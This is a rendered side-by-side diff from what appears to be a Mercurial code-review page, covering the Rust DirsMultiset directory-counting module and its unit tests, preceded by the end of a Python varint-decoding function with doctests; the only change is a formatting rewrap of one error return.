3287 def uvarintdecodestream(fh):
3292 def uvarintdecodestream(fh):
3288 """Decode an unsigned variable length integer from a stream.
3293 """Decode an unsigned variable length integer from a stream.
3289
3294
3290 The passed argument is anything that has a ``.read(N)`` method.
3295 The passed argument is anything that has a ``.read(N)`` method.
3291
3296
3292 >>> try:
3297 >>> try:
3293 ... from StringIO import StringIO as BytesIO
3298 ... from StringIO import StringIO as BytesIO
3294 ... except ImportError:
3299 ... except ImportError:
3295 ... from io import BytesIO
3300 ... from io import BytesIO
3296 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3297 0
3302 0
3298 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3299 1
3304 1
3300 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3301 127
3306 127
3302 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3303 1337
3308 1337
3304 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3305 65536
3310 65536
3306 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3307 Traceback (most recent call last):
3312 Traceback (most recent call last):
3308 ...
3313 ...
3309 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3310 """
3315 """
3311 result = 0
3316 result = 0
3312 shift = 0
3317 shift = 0
3313 while True:
3318 while True:
3314 byte = ord(readexactly(fh, 1))
3319 byte = ord(readexactly(fh, 1))
3315 result |= ((byte & 0x7f) << shift)
3320 result |= ((byte & 0x7f) << shift)
3316 if not (byte & 0x80):
3321 if not (byte & 0x80):
3317 return result
3322 return result
3318 shift += 7
3323 shift += 7
@@ -1,355 +1,357 b''
1 // dirs_multiset.rs
1 // dirs_multiset.rs
2 //
2 //
3 // Copyright 2019 Raphaël Gomès <rgomes@octobus.net>
3 // Copyright 2019 Raphaël Gomès <rgomes@octobus.net>
4 //
4 //
5 // This software may be used and distributed according to the terms of the
5 // This software may be used and distributed according to the terms of the
6 // GNU General Public License version 2 or any later version.
6 // GNU General Public License version 2 or any later version.
7
7
8 //! A multiset of directory names.
8 //! A multiset of directory names.
9 //!
9 //!
10 //! Used to counts the references to directories in a manifest or dirstate.
10 //! Used to counts the references to directories in a manifest or dirstate.
11 use std::collections::hash_map::Entry;
11 use std::collections::hash_map::Entry;
12 use std::collections::HashMap;
12 use std::collections::HashMap;
13 use std::ops::Deref;
13 use std::ops::Deref;
14 use {DirsIterable, DirstateEntry, DirstateMapError};
14 use {DirsIterable, DirstateEntry, DirstateMapError};
15
15
16 #[derive(PartialEq, Debug)]
16 #[derive(PartialEq, Debug)]
17 pub struct DirsMultiset {
17 pub struct DirsMultiset {
18 inner: HashMap<Vec<u8>, u32>,
18 inner: HashMap<Vec<u8>, u32>,
19 }
19 }
20
20
21 impl Deref for DirsMultiset {
21 impl Deref for DirsMultiset {
22 type Target = HashMap<Vec<u8>, u32>;
22 type Target = HashMap<Vec<u8>, u32>;
23
23
24 fn deref(&self) -> &Self::Target {
24 fn deref(&self) -> &Self::Target {
25 &self.inner
25 &self.inner
26 }
26 }
27 }
27 }
28
28
29 impl DirsMultiset {
29 impl DirsMultiset {
30 /// Initializes the multiset from a dirstate or a manifest.
30 /// Initializes the multiset from a dirstate or a manifest.
31 ///
31 ///
32 /// If `skip_state` is provided, skips dirstate entries with equal state.
32 /// If `skip_state` is provided, skips dirstate entries with equal state.
33 pub fn new(iterable: DirsIterable, skip_state: Option<i8>) -> Self {
33 pub fn new(iterable: DirsIterable, skip_state: Option<i8>) -> Self {
34 let mut multiset = DirsMultiset {
34 let mut multiset = DirsMultiset {
35 inner: HashMap::new(),
35 inner: HashMap::new(),
36 };
36 };
37
37
38 match iterable {
38 match iterable {
39 DirsIterable::Dirstate(vec) => {
39 DirsIterable::Dirstate(vec) => {
40 for (ref filename, DirstateEntry { state, .. }) in vec {
40 for (ref filename, DirstateEntry { state, .. }) in vec {
41 // This `if` is optimized out of the loop
41 // This `if` is optimized out of the loop
42 if let Some(skip) = skip_state {
42 if let Some(skip) = skip_state {
43 if skip != state {
43 if skip != state {
44 multiset.add_path(filename);
44 multiset.add_path(filename);
45 }
45 }
46 } else {
46 } else {
47 multiset.add_path(filename);
47 multiset.add_path(filename);
48 }
48 }
49 }
49 }
50 }
50 }
51 DirsIterable::Manifest(vec) => {
51 DirsIterable::Manifest(vec) => {
52 for ref filename in vec {
52 for ref filename in vec {
53 multiset.add_path(filename);
53 multiset.add_path(filename);
54 }
54 }
55 }
55 }
56 }
56 }
57
57
58 multiset
58 multiset
59 }
59 }
60
60
61 /// Returns the slice up to the next directory name from right to left,
61 /// Returns the slice up to the next directory name from right to left,
62 /// without trailing slash
62 /// without trailing slash
63 fn find_dir(path: &[u8]) -> &[u8] {
63 fn find_dir(path: &[u8]) -> &[u8] {
64 let mut path = path;
64 let mut path = path;
65 loop {
65 loop {
66 if let Some(new_pos) = path.len().checked_sub(1) {
66 if let Some(new_pos) = path.len().checked_sub(1) {
67 if path[new_pos] == b'/' {
67 if path[new_pos] == b'/' {
68 break &path[..new_pos];
68 break &path[..new_pos];
69 }
69 }
70 path = &path[..new_pos];
70 path = &path[..new_pos];
71 } else {
71 } else {
72 break &[];
72 break &[];
73 }
73 }
74 }
74 }
75 }
75 }
76
76
77 /// Increases the count of deepest directory contained in the path.
77 /// Increases the count of deepest directory contained in the path.
78 ///
78 ///
79 /// If the directory is not yet in the map, adds its parents.
79 /// If the directory is not yet in the map, adds its parents.
80 pub fn add_path(&mut self, path: &[u8]) {
80 pub fn add_path(&mut self, path: &[u8]) {
81 let mut pos = path.len();
81 let mut pos = path.len();
82
82
83 loop {
83 loop {
84 let subpath = Self::find_dir(&path[..pos]);
84 let subpath = Self::find_dir(&path[..pos]);
85 if let Some(val) = self.inner.get_mut(subpath) {
85 if let Some(val) = self.inner.get_mut(subpath) {
86 *val += 1;
86 *val += 1;
87 break;
87 break;
88 }
88 }
89 self.inner.insert(subpath.to_owned(), 1);
89 self.inner.insert(subpath.to_owned(), 1);
90
90
91 pos = subpath.len();
91 pos = subpath.len();
92 if pos == 0 {
92 if pos == 0 {
93 break;
93 break;
94 }
94 }
95 }
95 }
96 }
96 }
97
97
98 /// Decreases the count of deepest directory contained in the path.
98 /// Decreases the count of deepest directory contained in the path.
99 ///
99 ///
100 /// If it is the only reference, decreases all parents until one is
100 /// If it is the only reference, decreases all parents until one is
101 /// removed.
101 /// removed.
102 /// If the directory is not in the map, something horrible has happened.
102 /// If the directory is not in the map, something horrible has happened.
103 pub fn delete_path(
103 pub fn delete_path(
104 &mut self,
104 &mut self,
105 path: &[u8],
105 path: &[u8],
106 ) -> Result<(), DirstateMapError> {
106 ) -> Result<(), DirstateMapError> {
107 let mut pos = path.len();
107 let mut pos = path.len();
108
108
109 loop {
109 loop {
110 let subpath = Self::find_dir(&path[..pos]);
110 let subpath = Self::find_dir(&path[..pos]);
111 match self.inner.entry(subpath.to_owned()) {
111 match self.inner.entry(subpath.to_owned()) {
112 Entry::Occupied(mut entry) => {
112 Entry::Occupied(mut entry) => {
113 let val = entry.get().clone();
113 let val = entry.get().clone();
114 if val > 1 {
114 if val > 1 {
115 entry.insert(val - 1);
115 entry.insert(val - 1);
116 break;
116 break;
117 }
117 }
118 entry.remove();
118 entry.remove();
119 }
119 }
120 Entry::Vacant(_) => {
120 Entry::Vacant(_) => {
121 return Err(DirstateMapError::PathNotFound(path.to_owned()))
121 return Err(DirstateMapError::PathNotFound(
122 path.to_owned(),
123 ))
122 }
124 }
123 };
125 };
124
126
125 pos = subpath.len();
127 pos = subpath.len();
126 if pos == 0 {
128 if pos == 0 {
127 break;
129 break;
128 }
130 }
129 }
131 }
130
132
131 Ok(())
133 Ok(())
132 }
134 }
133 }
135 }
134
136
135 #[cfg(test)]
137 #[cfg(test)]
136 mod tests {
138 mod tests {
137 use super::*;
139 use super::*;
138
140
139 #[test]
141 #[test]
140 fn test_delete_path_path_not_found() {
142 fn test_delete_path_path_not_found() {
141 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
143 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
142 let path = b"doesnotexist/";
144 let path = b"doesnotexist/";
143 assert_eq!(
145 assert_eq!(
144 Err(DirstateMapError::PathNotFound(path.to_vec())),
146 Err(DirstateMapError::PathNotFound(path.to_vec())),
145 map.delete_path(path)
147 map.delete_path(path)
146 );
148 );
147 }
149 }
148
150
149 #[test]
151 #[test]
150 fn test_delete_path_empty_path() {
152 fn test_delete_path_empty_path() {
151 let mut map =
153 let mut map =
152 DirsMultiset::new(DirsIterable::Manifest(vec![vec![]]), None);
154 DirsMultiset::new(DirsIterable::Manifest(vec![vec![]]), None);
153 let path = b"";
155 let path = b"";
154 assert_eq!(Ok(()), map.delete_path(path));
156 assert_eq!(Ok(()), map.delete_path(path));
155 assert_eq!(
157 assert_eq!(
156 Err(DirstateMapError::PathNotFound(path.to_vec())),
158 Err(DirstateMapError::PathNotFound(path.to_vec())),
157 map.delete_path(path)
159 map.delete_path(path)
158 );
160 );
159 }
161 }
160
162
161 #[test]
163 #[test]
162 fn test_delete_path_successful() {
164 fn test_delete_path_successful() {
163 let mut map = DirsMultiset {
165 let mut map = DirsMultiset {
164 inner: [("", 5), ("a", 3), ("a/b", 2), ("a/c", 1)]
166 inner: [("", 5), ("a", 3), ("a/b", 2), ("a/c", 1)]
165 .iter()
167 .iter()
166 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
168 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
167 .collect(),
169 .collect(),
168 };
170 };
169
171
170 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
172 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
171 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
173 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
172 assert_eq!(
174 assert_eq!(
173 Err(DirstateMapError::PathNotFound(b"a/b/".to_vec())),
175 Err(DirstateMapError::PathNotFound(b"a/b/".to_vec())),
174 map.delete_path(b"a/b/")
176 map.delete_path(b"a/b/")
175 );
177 );
176
178
177 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
179 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
178 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
180 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
179 eprintln!("{:?}", map);
181 eprintln!("{:?}", map);
180 assert_eq!(Ok(()), map.delete_path(b"a/"));
182 assert_eq!(Ok(()), map.delete_path(b"a/"));
181 eprintln!("{:?}", map);
183 eprintln!("{:?}", map);
182
184
183 assert_eq!(Ok(()), map.delete_path(b"a/c/"));
185 assert_eq!(Ok(()), map.delete_path(b"a/c/"));
184 assert_eq!(
186 assert_eq!(
185 Err(DirstateMapError::PathNotFound(b"a/c/".to_vec())),
187 Err(DirstateMapError::PathNotFound(b"a/c/".to_vec())),
186 map.delete_path(b"a/c/")
188 map.delete_path(b"a/c/")
187 );
189 );
188 }
190 }
189
191
190 #[test]
192 #[test]
191 fn test_add_path_empty_path() {
193 fn test_add_path_empty_path() {
192 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
194 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
193 let path = b"";
195 let path = b"";
194 map.add_path(path);
196 map.add_path(path);
195
197
196 assert_eq!(1, map.len());
198 assert_eq!(1, map.len());
197 }
199 }
198
200
199 #[test]
201 #[test]
200 fn test_add_path_successful() {
202 fn test_add_path_successful() {
201 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
203 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
202
204
203 map.add_path(b"a/");
205 map.add_path(b"a/");
204 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
206 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
205 assert_eq!(1, *map.get(&Vec::new()).unwrap());
207 assert_eq!(1, *map.get(&Vec::new()).unwrap());
206 assert_eq!(2, map.len());
208 assert_eq!(2, map.len());
207
209
208 // Non directory should be ignored
210 // Non directory should be ignored
209 map.add_path(b"a");
211 map.add_path(b"a");
210 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
212 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
211 assert_eq!(2, map.len());
213 assert_eq!(2, map.len());
212
214
213 // Non directory will still add its base
215 // Non directory will still add its base
214 map.add_path(b"a/b");
216 map.add_path(b"a/b");
215 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
217 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
216 assert_eq!(2, map.len());
218 assert_eq!(2, map.len());
217
219
218 // Duplicate path works
220 // Duplicate path works
219 map.add_path(b"a/");
221 map.add_path(b"a/");
220 assert_eq!(3, *map.get(&b"a".to_vec()).unwrap());
222 assert_eq!(3, *map.get(&b"a".to_vec()).unwrap());
221
223
222 // Nested dir adds to its base
224 // Nested dir adds to its base
223 map.add_path(b"a/b/");
225 map.add_path(b"a/b/");
224 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
226 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
225 assert_eq!(1, *map.get(&b"a/b".to_vec()).unwrap());
227 assert_eq!(1, *map.get(&b"a/b".to_vec()).unwrap());
226
228
227 // but not its base's base, because it already existed
229 // but not its base's base, because it already existed
228 map.add_path(b"a/b/c/");
230 map.add_path(b"a/b/c/");
229 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
231 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
230 assert_eq!(2, *map.get(&b"a/b".to_vec()).unwrap());
232 assert_eq!(2, *map.get(&b"a/b".to_vec()).unwrap());
231
233
232 map.add_path(b"a/c/");
234 map.add_path(b"a/c/");
233 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
235 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
234
236
235 let expected = DirsMultiset {
237 let expected = DirsMultiset {
236 inner: [("", 2), ("a", 5), ("a/b", 2), ("a/b/c", 1), ("a/c", 1)]
238 inner: [("", 2), ("a", 5), ("a/b", 2), ("a/b/c", 1), ("a/c", 1)]
237 .iter()
239 .iter()
238 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
240 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
239 .collect(),
241 .collect(),
240 };
242 };
241 assert_eq!(map, expected);
243 assert_eq!(map, expected);
242 }
244 }
243
245
244 #[test]
246 #[test]
245 fn test_dirsmultiset_new_empty() {
247 fn test_dirsmultiset_new_empty() {
246 use DirsIterable::{Dirstate, Manifest};
248 use DirsIterable::{Dirstate, Manifest};
247
249
248 let new = DirsMultiset::new(Manifest(vec![]), None);
250 let new = DirsMultiset::new(Manifest(vec![]), None);
249 let expected = DirsMultiset {
251 let expected = DirsMultiset {
250 inner: HashMap::new(),
252 inner: HashMap::new(),
251 };
253 };
252 assert_eq!(expected, new);
254 assert_eq!(expected, new);
253
255
254 let new = DirsMultiset::new(Dirstate(vec![]), None);
256 let new = DirsMultiset::new(Dirstate(vec![]), None);
255 let expected = DirsMultiset {
257 let expected = DirsMultiset {
256 inner: HashMap::new(),
258 inner: HashMap::new(),
257 };
259 };
258 assert_eq!(expected, new);
260 assert_eq!(expected, new);
259 }
261 }
260
262
261 #[test]
263 #[test]
262 fn test_dirsmultiset_new_no_skip() {
264 fn test_dirsmultiset_new_no_skip() {
263 use DirsIterable::{Dirstate, Manifest};
265 use DirsIterable::{Dirstate, Manifest};
264
266
265 let input_vec = ["a/", "b/", "a/c", "a/d/"]
267 let input_vec = ["a/", "b/", "a/c", "a/d/"]
266 .iter()
268 .iter()
267 .map(|e| e.as_bytes().to_vec())
269 .map(|e| e.as_bytes().to_vec())
268 .collect();
270 .collect();
269 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
271 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
270 .iter()
272 .iter()
271 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
273 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
272 .collect();
274 .collect();
273
275
274 let new = DirsMultiset::new(Manifest(input_vec), None);
276 let new = DirsMultiset::new(Manifest(input_vec), None);
275 let expected = DirsMultiset {
277 let expected = DirsMultiset {
276 inner: expected_inner,
278 inner: expected_inner,
277 };
279 };
278 assert_eq!(expected, new);
280 assert_eq!(expected, new);
279
281
280 let input_map = ["a/", "b/", "a/c", "a/d/"]
282 let input_map = ["a/", "b/", "a/c", "a/d/"]
281 .iter()
283 .iter()
282 .map(|f| {
284 .map(|f| {
283 (
285 (
284 f.as_bytes().to_vec(),
286 f.as_bytes().to_vec(),
285 DirstateEntry {
287 DirstateEntry {
286 state: 0,
288 state: 0,
287 mode: 0,
289 mode: 0,
288 mtime: 0,
290 mtime: 0,
289 size: 0,
291 size: 0,
290 },
292 },
291 )
293 )
292 })
294 })
293 .collect();
295 .collect();
294 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
296 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
295 .iter()
297 .iter()
296 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
298 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
297 .collect();
299 .collect();
298
300
299 let new = DirsMultiset::new(Dirstate(input_map), None);
301 let new = DirsMultiset::new(Dirstate(input_map), None);
300 let expected = DirsMultiset {
302 let expected = DirsMultiset {
301 inner: expected_inner,
303 inner: expected_inner,
302 };
304 };
303 assert_eq!(expected, new);
305 assert_eq!(expected, new);
304 }
306 }
305
307
306 #[test]
308 #[test]
307 fn test_dirsmultiset_new_skip() {
309 fn test_dirsmultiset_new_skip() {
308 use DirsIterable::{Dirstate, Manifest};
310 use DirsIterable::{Dirstate, Manifest};
309
311
310 let input_vec = ["a/", "b/", "a/c", "a/d/"]
312 let input_vec = ["a/", "b/", "a/c", "a/d/"]
311 .iter()
313 .iter()
312 .map(|e| e.as_bytes().to_vec())
314 .map(|e| e.as_bytes().to_vec())
313 .collect();
315 .collect();
314 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
316 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
315 .iter()
317 .iter()
316 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
318 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
317 .collect();
319 .collect();
318
320
319 let new = DirsMultiset::new(Manifest(input_vec), Some('n' as i8));
321 let new = DirsMultiset::new(Manifest(input_vec), Some('n' as i8));
320 let expected = DirsMultiset {
322 let expected = DirsMultiset {
321 inner: expected_inner,
323 inner: expected_inner,
322 };
324 };
323 // Skip does not affect a manifest
325 // Skip does not affect a manifest
324 assert_eq!(expected, new);
326 assert_eq!(expected, new);
325
327
326 let input_map =
328 let input_map =
327 [("a/", 'n'), ("a/b/", 'n'), ("a/c", 'r'), ("a/d/", 'm')]
329 [("a/", 'n'), ("a/b/", 'n'), ("a/c", 'r'), ("a/d/", 'm')]
328 .iter()
330 .iter()
329 .map(|(f, state)| {
331 .map(|(f, state)| {
330 (
332 (
331 f.as_bytes().to_vec(),
333 f.as_bytes().to_vec(),
332 DirstateEntry {
334 DirstateEntry {
333 state: *state as i8,
335 state: *state as i8,
334 mode: 0,
336 mode: 0,
335 mtime: 0,
337 mtime: 0,
336 size: 0,
338 size: 0,
337 },
339 },
338 )
340 )
339 })
341 })
340 .collect();
342 .collect();
341
343
342 // "a" incremented with "a/c" and "a/d/"
344 // "a" incremented with "a/c" and "a/d/"
343 let expected_inner = [("", 1), ("a", 2), ("a/d", 1)]
345 let expected_inner = [("", 1), ("a", 2), ("a/d", 1)]
344 .iter()
346 .iter()
345 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
347 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
346 .collect();
348 .collect();
347
349
348 let new = DirsMultiset::new(Dirstate(input_map), Some('n' as i8));
350 let new = DirsMultiset::new(Dirstate(input_map), Some('n' as i8));
349 let expected = DirsMultiset {
351 let expected = DirsMultiset {
350 inner: expected_inner,
352 inner: expected_inner,
351 };
353 };
352 assert_eq!(expected, new);
354 assert_eq!(expected, new);
353 }
355 }
354
356
355 }
357 }
General Comments 0
You need to be logged in to leave comments. Login now